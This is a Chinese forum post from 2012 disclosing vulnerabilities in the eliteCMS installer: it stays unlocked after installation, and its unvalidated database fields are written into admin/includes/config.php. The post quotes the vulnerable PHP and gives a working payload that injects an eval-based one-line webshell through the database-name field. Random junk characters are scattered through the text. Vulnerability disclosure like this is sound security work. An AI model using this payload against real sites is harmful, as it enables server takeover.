eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装, o. y; `+ s0 G+ [7 l
2 |3 W- }. i+ [' B2 _另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
; v- G/ `0 k% h* z& L! I; |: E我们来看代码:
; X X3 I: ]% d; T
+ O" I2 f( D5 c2 X...
* a6 U: x$ w1 S4 i' V0 Gelseif ($_GET['step'] == "4") {
' V3 }$ L1 y8 [! U $file = "../admin/includes/config.php";
& c9 a% S7 F6 M. C" @0 u& J $write = "<?php\n";
1 z4 b' Q5 e) m% u& c# x8 L $write .= "/**\n";, F3 l+ I7 e8 Q/ o
$write .= "*\n";
5 B) f9 |% n3 e9 U0 Y; @ $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
4 H: w n( F4 b, [* B& E...略...
9 b/ m- i* s1 S7 W+ G $write .= "*\n";3 G& b# B6 {: A4 ~, [
$write .= "*/\n";
/ {) E( v5 Q( _ $write .= "\n";
% P* w- e- ~/ L6 x $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
, B2 ^% L" O. X8 D# x/ S $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n"; _: \* Y; p6 y8 r
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";) c- N) Z% H" ~, T& [0 p
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";$ w2 i) E; W- c- z& v! ^
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";- K# x$ g8 R' w: A) N6 z: p
$write .= "if (!\$connection) {\n";4 Y. R v# w7 x+ k6 _
$write .= " die(\"Database connection failed\" .mysql_error());\n";
" _. U0 ?0 H1 B: G4 i+ A4 T+ j) e $write .= " \n";
3 e6 Q) l- E7 }7 }, E $write .= "} \n";. O0 f3 L) c+ Q$ D! \* `7 h- Q& d
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";( p# ~3 o+ F( \" _
$write .= "if (!\$db_select) {\n";" c3 W3 m6 y" j% K* l
$write .= " die(\"Database select failed\" .mysql_error());\n";
" x( L' V9 N9 I# E; ^% y $write .= " \n";; [: s. }2 ?9 R4 ~4 c
$write .= "} \n";
" o, J8 j6 N& x% z $write .= "?>\n";
7 j4 z* F3 ]+ y- Q) h: \$ d5 F : s% E* Z) y3 Q7 n8 C: [0 q
$writer = fopen($file, 'w');
7 f2 E* n% P k% S...
2 O, ~8 C) S2 @1 X% Q/ _& m% O ( |+ L( X/ }- T* m( u
在看代码:- [. R$ R* {6 O7 ^
+ W/ l$ b6 Y0 |9 i" S$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
) _* l L) j% A8 W8 @/ `/ R( M1 E$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
& @4 U4 g6 Y% ]1 {- D0 M0 ~$_SESSION['DB_USER'] = $_POST['DB_USER'];
: H3 o" \+ ~% u {$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
* f0 o2 J9 e! t M7 A7 ?9 E " `$ j m2 |8 y. b% l
取值未作任何验证
3 C) }1 U0 I/ H# V; d! g' o如果将数据库名POST数据:4 K; k7 u! H; N% r7 V" `' `2 k$ q
' e# Y( l/ P# v* R4 X! W! d"?><?php eval($_POST[c]);?><?php
) A4 n7 t& G2 K1 B5 l# G1 I
% a) J# v/ H# b4 V: S( U+ \ X将导致一句话后门写入/admin/includes/config.php' Z, A+ K: B) E1 B5 B' F+ X
|
发表于 2012-11-18 13:59:27
收藏
支持
反对